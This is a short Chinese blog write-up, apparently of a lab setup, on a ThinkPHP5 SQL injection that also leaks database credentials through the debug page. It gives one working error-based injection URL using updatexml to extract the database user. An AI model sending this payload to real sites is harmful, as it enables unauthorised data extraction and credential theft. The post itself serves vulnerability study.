ThinkPHP5 SQL注入漏洞 && 敏感信息泄露


ThinkPHP5 SQL注入漏洞 && 敏感信息泄露

漏洞原理

漏洞原理说明:

漏洞利用

访问 http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1,信息成功被爆出:

当然,这是一个比较鸡肋的SQL注入漏洞。但通过DEBUG页面,我们找到了数据库的账号、密码:


文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
ThinkPHP5 5.0.23 远程代码执行漏洞 ThinkPHP5 5.0.23 远程代码执行漏洞
ThinkPHP5 5.0.23 远程代码执行漏洞ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用
2019-03-02
下一篇 
Tomcat PUT 方法任意写文件漏洞(CVE-2017-12615) Tomcat PUT 方法任意写文件漏洞(CVE-2017-12615)
Tomcat PUT 方法任意写文件漏洞(CVE-2017-12615)漏洞原理漏洞本质 Tomcat 配置了可写(readonly=false),导致我们可以往服务器写文件: <servlet> <servlet
2019-03-02
  目录